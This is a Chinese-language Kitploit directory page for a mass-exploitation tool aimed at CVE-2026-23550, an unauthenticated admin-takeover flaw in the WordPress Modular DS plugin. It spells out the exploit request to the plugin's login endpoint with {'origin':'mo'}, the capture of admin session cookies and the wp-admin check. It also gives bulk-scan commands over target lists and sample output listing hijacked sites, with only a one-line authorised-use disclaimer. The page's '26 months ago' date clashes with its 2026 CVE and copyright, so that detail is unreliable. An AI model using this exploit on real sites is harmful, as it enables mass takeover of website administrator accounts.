Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/dzmind2312/mass-cve-2026-23550-exploit
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubdzmind2312/mass-cve-2026-23550-exploit

Mass-CVE-2026-23550-Exploit

多线程 Python 扫描器,用于检测 CVE-2026-23550,可识别 WordPress Modular DS 插件中未经身份验证的管理员接管漏洞,并带有完整的 wp-admin 验证功能。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
26个月前尚未审核

🔥 CVE-2026-23550 Modular DS 扫描器

用于 CVE-2026-23550(CVSS 10.0)WordPress Modular DS 插件 ≤2.5.1 漏洞的多线程 Python 扫描器,该漏洞影响 40k+ 站点。通过 getLogin() 绕过检测未认证管理员接管,并附带完整的 wp-admin 访问验证。 功能 ✨

root@kitploit:~
🔥 完整管理员访问检测(cookies + wp-admin 验证)

⚡ 多线程(最多 50+ 并发目标)

📊 带 rich 的动画进度条

🎨 彩色汇总表

💾 自动将易受攻击的目标保存到文件

🚀 生产级超时与错误处理

安装 🚀

bash pip3 install requests rich chmod +x modular_ds.py

用法 📋

bash

批量扫描(50 线程)

python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt

漏洞赏金侦察

python3 modular_ds.py -l univ-oran1.txt -t 20

默认(20 线程,输出到 vulns.txt)

python3 modular_ds.py -l targets.txt

targets.txt 格式:

text https://target1.com http://site2.com

跳过注释

https://sub.domain.tld

参数 Flag 描述 默认值 -l, --list 必需 目标文件(每行 1 个 URL) - -t, --threads 最大并发线程数 20 -o, --output 易受攻击目标输出文件 vulns.txt 示例输出 🖥️

text 🔥 CVE-2026-23550 Modular DS 扫描器 🔥 目标:247 | 线程:50 | 输出:bounty_vulns.txt

⠋ 正在扫描 Modular DS... 127/247 (51%) ✅ 易受攻击:https://target.com 🔥 完整管理员访问:target.com

┌─────────────┬─────────────────────────────────────┬────────────┐ │ 状态 │ 目标 │ 详情 │ ├─────────────┼─────────────────────────────────────┼────────────┤ │ 🔥 完整 │ https://target.com │ 3 个 cookies │ └─────────────┴─────────────────────────────────────┴────────────┘

💾 4 个易受攻击目标 → bounty_vulns.txt

检测逻辑 🔍

text

  1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
  2. ✅ 检查 wordpress_logged_in_* 管理员 cookie
  3. ✅ 验证 /wp-admin/ 仪表盘访问
  4. 💾 保存已确认的完整管理员访问目标

法律与道德使用 ⚖️

text ⚠️ 仅限用于: ✅ 授权渗透测试 ✅ 漏洞赏金计划
✅ 安全研究实验室 ✅ 自有基础设施

❌ 切勿用于未授权目标

要求 📦

text requests>=2.31.0 rich>=13.0.0

下载工具